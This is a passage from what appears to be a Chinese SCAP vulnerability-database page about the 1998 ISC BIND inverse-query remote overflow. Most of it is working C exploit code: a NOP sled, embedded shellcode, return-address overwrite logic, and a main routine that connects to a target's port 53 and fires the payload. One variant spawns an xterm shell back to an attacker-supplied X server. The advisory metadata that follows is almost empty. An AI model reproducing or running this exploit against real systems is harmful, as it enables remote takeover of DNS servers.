      snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));

      c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
      c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);

      i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);

      memset(ptr,0x90,i);
      memcpy((ptr+i),c1,strlen(c1));
      memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
      memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
      memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
      char c0de[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
      int i = EVILSPACE-strlen(c0de);

      memset(ptr,0x90,i);
      memcpy((ptr+i),c0de,strlen(c0de));
#endif
    }
  else
    return(0);

  if(!optimized)
    {
      memcpy((ptr+(dlen-16)),&al,sizeof(al));
      memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
    }

  i = (optimized?t.opt_addr:t.addr)+offset;
  memcpy((ptr+(dlen-4)),&i,sizeof(i));
  len += dlen;

  return(send_packet(fd,buff,len));
}

int main(int argc, char *argv[])
{
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
  struct sockaddr_in sa;
  struct in_addr xs;

  for(i=0;target[i].desc[0];i++);

  if(argc<3)
    {
      fprintf(stderr,"\ntarget types:\n");
      fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
	      "description");
      for(target_index=0;target_index<i;target_index++)
	fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
		(unsigned int)target[target_index].addr,
		(unsigned int)target[target_index].opt_addr,
		target[target_index].desc);
      fprintf(stderr,
	      "\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
	      argv[0]);
      exit(-1);
    }

  if((argc>3)&&((target_index=atoi(argv[3]))>=i))
    {
      fprintf(stderr,"error: invalid target type %d\n",target_index);
      exit(-1);
    }

  if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
    {
      fprintf(stderr,"error: internal error\n");
      exit(-1);
    }

  if(argc>4)
    {
      optimized = atoi(argv[4]);
      if((optimized!=0)&&(optimized!=1))
	{
	  fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
	  exit(-1);
	}
    }

  if((optimized==0)&&(target[target_index].addr==0))
    optimized = 1;

  if((optimized==1)&&(target[target_index].opt_addr==0))
    optimized = 0;

  if(argc>5)
    offset = atoi(argv[5]);

  if(!(xs.s_addr=resolve(argv[2])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
      exit(-1);
    }

  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
    {
      perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      perror("error: connect");
      exit(-1);
    }

  printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  printf("target type        : %s\n",target[target_index].desc);
  printf("optimized named    : %s\n",(optimized?"YES":"NO"));
  printf("anbuff addr        : 0x%x\n",(unsigned int)
	 (optimized?target[target_index].opt_addr:target[target_index].addr));
  printf("anbuff addr offset : %lu\n",offset);
  printf("xterm display dest : %s:0\n",inet_ntoa(xs));
  printf("exploiting . . .\n");

  switch(attack(sock,xs,target[target_index],offset,optimized))
    {
    case -1:
      perror("error: attack");
      return(-1);
      break;

    case 0:
      fprintf(stderr,"error: internal error\n");
      return(-1);
      break;
    }

  if(close(sock)!=0)
    {
      perror("error: close");
      return(-1);
    }

  exit(0);
}

- Vulnerability information

913
ISC BIND Inverse-Query Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Uncoordinated Disclosure, Discovered in the Wild

- Vulnerability description

Unknown or Incomplete

- Timeline

1998-04-08 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.